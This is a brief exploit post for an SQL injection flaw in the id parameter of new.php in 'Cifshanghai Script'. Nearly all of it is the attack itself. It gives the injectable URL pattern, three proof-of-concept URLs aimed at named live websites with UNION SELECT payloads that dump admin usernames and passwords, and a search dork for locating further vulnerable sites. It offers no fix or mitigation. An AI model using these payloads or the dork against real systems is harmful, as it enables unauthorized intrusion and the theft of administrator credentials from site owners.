[o] Cifshanghai Script SQL Injection Vulnerability
Software : Cifshanghai Script
Vendor : http://www.cifshanghai.com/
Author : NoGe
[o] Vulnerable file
new.php
[o] Exploit
http://localhost/[path]/new.php?id=[SQL]
[o] Proof Of Concept
http://www.feidamotohelmet.com/new.php?id=-26%20union%20select%201,2,3,4,group_concat(name,0x3a,password)%20from%20fk_admin--
http://www.vennas.com/new.php?id=-1%20union%20select%201,2,3,4,group_concat(name,0x3a,password)%20from%20fk_admin--
http://www.nicefurniture.com.cn/new.php?id=-20%20union%20select%201,2,3,4,5,6,group_concat(name,0x3a,password),8%20from%20fk_admin--
[o] Dork
"Powered by cifshanghai"
[o] Note
this is a private script